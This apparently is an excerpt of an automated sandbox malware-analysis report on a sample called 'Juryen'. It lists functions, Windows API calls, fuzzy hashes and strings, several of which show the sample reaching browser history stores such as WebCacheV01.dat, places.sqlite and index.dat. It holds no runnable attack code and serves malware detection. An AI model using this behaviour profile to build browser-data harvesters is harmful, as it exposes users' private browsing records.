                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 1475443563-3708268960
                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 1579243037-1578091866
                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E60F
                                                                    • memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Strings
                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                    • API String ID: 2887208581-2114579845
                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                    • API String ID: 2221118986-1725073988
                                                                    • Opcode ID: 62e6d944a6cbe5f9c528c34acab60ede998b043a0556ec9d199cf82d841fd078
                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                    • Opcode Fuzzy Hash: 62e6d944a6cbe5f9c528c34acab60ede998b043a0556ec9d199cf82d841fd078
                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@DeleteObject
                                                                    • String ID: r!A
                                                                    • API String ID: 1103273653-628097481
                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$memcmp
                                                                    • String ID: $$8
                                                                    • API String ID: 2808797137-435121686
                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                    • String ID:
                                                                    • API String ID: 1979745280-0
                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                    • free.MSVCRT ref: 00418803
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                    • String ID:
                                                                    • API String ID: 1355100292-0
                                                                    • Opcode ID: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                    • Opcode Fuzzy Hash: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                    • memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                    • String ID: history.dat$places.sqlite
                                                                    • API String ID: 2641622041-467022611
                                                                    • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                    • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 839530781-0
                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID: *.*$index.dat
                                                                    • API String ID: 1974802433-2863569691
                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FilePointer
                                                                    • String ID:
                                                                    • API String ID: 1156039329-0
                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
